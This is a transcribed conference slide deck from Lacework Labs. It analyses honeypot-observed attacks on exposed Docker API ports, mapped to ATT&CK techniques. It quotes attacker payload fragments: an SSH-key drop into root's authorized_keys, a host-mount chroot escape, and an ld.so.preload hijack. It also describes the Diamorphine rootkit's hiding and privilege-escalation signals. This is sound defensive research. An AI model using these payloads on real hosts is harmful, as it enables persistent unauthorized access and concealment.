From ATT&CKcon 3.0
By Jared Stroud, Lacework
Adversaries target common cloud misconfigurations in container-focused workflows for initial access. Whether this is Docker or Kubernetes environments, Lacework Labs has identified adversaries attempting to deploy malicious container images (T1610) , mine Cryptocurrency (T1496), and deploy C2 agents. Defenders new to the container space may be unaware of the built-in capabilities popular container runtime engines have that can help defend against rogue containers being deployed into their environment. Attendees will walk away with an understanding of what these attack patterns look like based on honeypot data Lacework has gathered over the past year, as well as techniques on how to defend their own container focused workloads.
14. https://github.com/gianlucaborello/libprocesshider/blob/master/processhider.c
Ghidra Pseudo C of Shared Objects grabbed by Docker bash script
● T1574.006 - Hijack Execution Flow: Dynamic Linker/Hijacking
○ Used for persistence/defense evasion
● Attack script wgets tar file of shared objects to be placed in /usr/local/lib and put in
ld.so.preload.
Notable Execution of Initial Payload (cronb.sh)
15. ● Rootkit (T1014) Features include:
● When loaded, the module starts invisible.
● Hide/unhide any process by sending a signal 31.
● Sending a signal 63(to any pid) makes the module become (in)visible.
● Sending a signal 64(to any pid) makes the given user become root.
● Files or directories starting with the MAGIC_PREFIX become invisible.
● Diamorphine is built on the victim machine, and has the MAGIC_PREFIX unchanged.
https://github.com/m0nad/Diamorphine/blob/master/diamorphine.h
diamorphine.h from attacker’s payload
Defense Evasion/Persistence - Diamorphine Rootkit
16. echo ssh key to /root/.ssh/authorized_keys
Exposed API Port (2375)
Attacker’s payload
● cmd": ["sh", "-c", "echo 'ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABgQDIdl8SFK8a6
VAjM6i8AAUtpl15<snippet>' >>
/opt/root/.ssh/authorized_keys]
T1189 - Drive by Compromise (SSH Key Dropping)
18. ● Lacework Labs has observed multiple adversaries leveraging Docker Hub as a
staging ground.
T1608 - Staging Capabilities (Docker Hub)
19. ● Ngrok - legitimate utility for proxying local connections to public facing services
(T1090).
○ Target users are developers that want to expose something locally on the internet.
○ Think of it as reverse ssh tunnels-as-a-service
● How adversaries abuse it:
○ Hosting payloads behind ngrok.
■ Free tier/paid tiers exist.
○ Avoids having to setup infrastructure beyond a VM.
T1608 - Staging Capabilities (T1608) Ngrok
20. mount /:/mnt && chroot /mnt
Exposed API Port (2375)
Attacker’s payload
Stopping The Compromise! Don’t expose the Docker Socket!